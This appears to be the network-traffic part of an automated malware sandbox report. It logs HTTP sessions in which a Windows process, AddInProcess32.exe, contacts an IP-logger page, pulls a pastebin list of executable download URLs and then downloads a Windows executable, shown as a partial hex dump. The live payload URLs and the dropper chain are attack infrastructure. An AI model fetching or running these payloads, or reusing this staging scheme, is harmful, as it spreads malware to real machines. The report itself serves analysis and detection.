                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC880INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            31192.168.2.555602172.67.169.8944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC41OUTGET /RNWPd.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: yip.su
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC908INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            memory: 0.36199188232421875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:57 +0000
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=44sLBJ%2FbRTv2dExM1OnXYs7kX3CaB%2BdoJhsQGEUdWFTxzTRTHj0hAuQ8On1278YnGkjT39rL8KPVkkeLk%2Bc81oXyJv%2Fnq3%2BznVFffYefI626C4%2FUcA2J%2B28%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282020cbfd69e3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC461INData Raw: 31 64 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                                                                                                                                                                                                                            Data Ascii: 1d16<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69
                                                                                                                                                                                                                                                            Data Ascii: visit-after" content="7 days" /><meta name="keywords" content="" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:image" content="https://cdn.i
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61
                                                                                                                                                                                                                                                            Data Ascii: display:none}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-dela
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 79 6c 65 3e 0a 0a 09 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20 5f 70 3b 0a 09 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78
                                                                                                                                                                                                                                                            Data Ascii: yle><script>var _p;if(navigator&&navigator.userAgentData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 72 6f 77 73 65 72 20 62 65 66 6f 72 65 20 70 72 6f 63 65 73 73 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: rowser before processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:cent
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC1369INData Raw: 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f 6d 61 69 6e 22 3e
                                                                                                                                                                                                                                                            Data Ascii: auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="domain">
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC148INData Raw: 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ion='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            32192.168.2.555601104.20.68.14344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC50OUTGET /raw/E0rY26ni HTTP/1.1
                                                                                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 4
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282023d8b569e3-LAS
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC800INData Raw: 33 31 39 0d 0a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 37 32 2e 31 32 38 2e 31 32 36 2f 49 6e 73 74 61 6c 6c 53 65 74 75 70 35 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 6a 2d 75 70 73 70 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6e 65 74 77 6f 72 6b 31 2f 64 6f 77 6e 6c 6f 61 64 73 2f 61 30 32 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 68 69 70 6f 66 64 65 73 74 69 6e 79 2e 63 6f 6d 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 74 79 2e 69 6e 6b 2f 70 70 67 38 78 0d 0a 68 74 74 70 73 3a 2f 2f 6e 61 6d 65 6d 61 69 6c 2e 6f 72 67 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31
                                                                                                                                                                                                                                                            Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            33192.168.2.555590104.192.141.144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC83OUTGET /j-upsps/microsoft_network1/downloads/a02.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: bitbucket.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:57 UTC4234INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                            server: envoy
                                                                                                                                                                                                                                                            x-usage-quota-remaining: 998501.513
                                                                                                                                                                                                                                                            vary: Accept-Language, Origin
                                                                                                                                                                                                                                                            x-usage-request-cost: 1140.03
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: c289a43347b744b9
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.032482
                                                                                                                                                                                                                                                            x-usage-system-time: 0.001719
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            x-served-by: e7bee276ad99
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 69
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: c289a43347b744b9
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.05568814277648926
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3890
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            34192.168.2.555604172.67.177.13344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC106OUTGET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 2
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FmxgvwGyHdHpQrYbtyJF8Y%2BdbVUnL%2F5G8qgePzIKjgnZmTKgrcDicotEp6GYgcjwMF3iH86RZm6glzvnRS5frP6RLuTq%2FAtIt2gjy2NCl0QO%2B8LsoECLKBqSaQFYNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202829bb09ef-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC687INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: ee 80 00 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0
                                                                                                                                                                                                                                                            Data Ascii: fff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]
